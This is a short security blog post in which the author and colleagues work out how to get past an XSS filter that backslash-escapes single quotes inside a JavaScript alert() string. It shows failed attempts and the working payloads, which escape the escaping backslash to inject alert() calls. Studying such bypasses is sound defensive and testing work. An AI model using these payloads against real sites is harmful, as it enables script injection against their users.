Bypassing XSS filter in alert msg box

Chintan, Ronnie and I were discussing about one issue regarding how to bypass a specific XSS filter in alert message box. We were unable to breakout.
Chintan's problem statement was:
I am running into one issue with XSS and was interested if there is any way I can bypass it.
Following the response code where user supplied input is embedded. Input is taken via a text box.
<script type="text/javascript">alert('No Information is found for the card 1');script>

User supplied input 1 is highlighted in red. I am trying to break out of this alert box, however when a single quote is given as input, the output is escaped using a backslash. It is as follows:

Input:     1'
Output: <script type="text/javascript">alert('No Information is found for the card 1\'');script>

I am using IE 8 and tried using back ticks just to check if I can get around this limitation, however it did not work.
Any suggestion on how to break out of this would be much helpful.

All characters except the single quote, <!-- and </script> are working.
I tried the following vector to escape out:

Input:     1`);alert(1);(`');
Output:
<script type="text/javascript">alert('No Information is found for the card 1`);alert(1);(`');script>

So, after a serires of discussion we came out with the solution:
;/\');alert(1);//  or   \');alert(\'XSS

And now this was successful bypass:
<script type="text/javascript">alert('No Information is found for the card ;/\\');alert("XSS");//');</script>
So, we successfully bypassed it

Comments

*Adi* said…
Interesting article on XSS Filter Bypassing. Helped a lot. And the best way to bypass filters is by analyzing the outputs for a given input, and then modifying the queries. Like you did.
Cool job! :)

Popular posts from this blog

SQL Injection in search field

File Upload through Null Byte Injection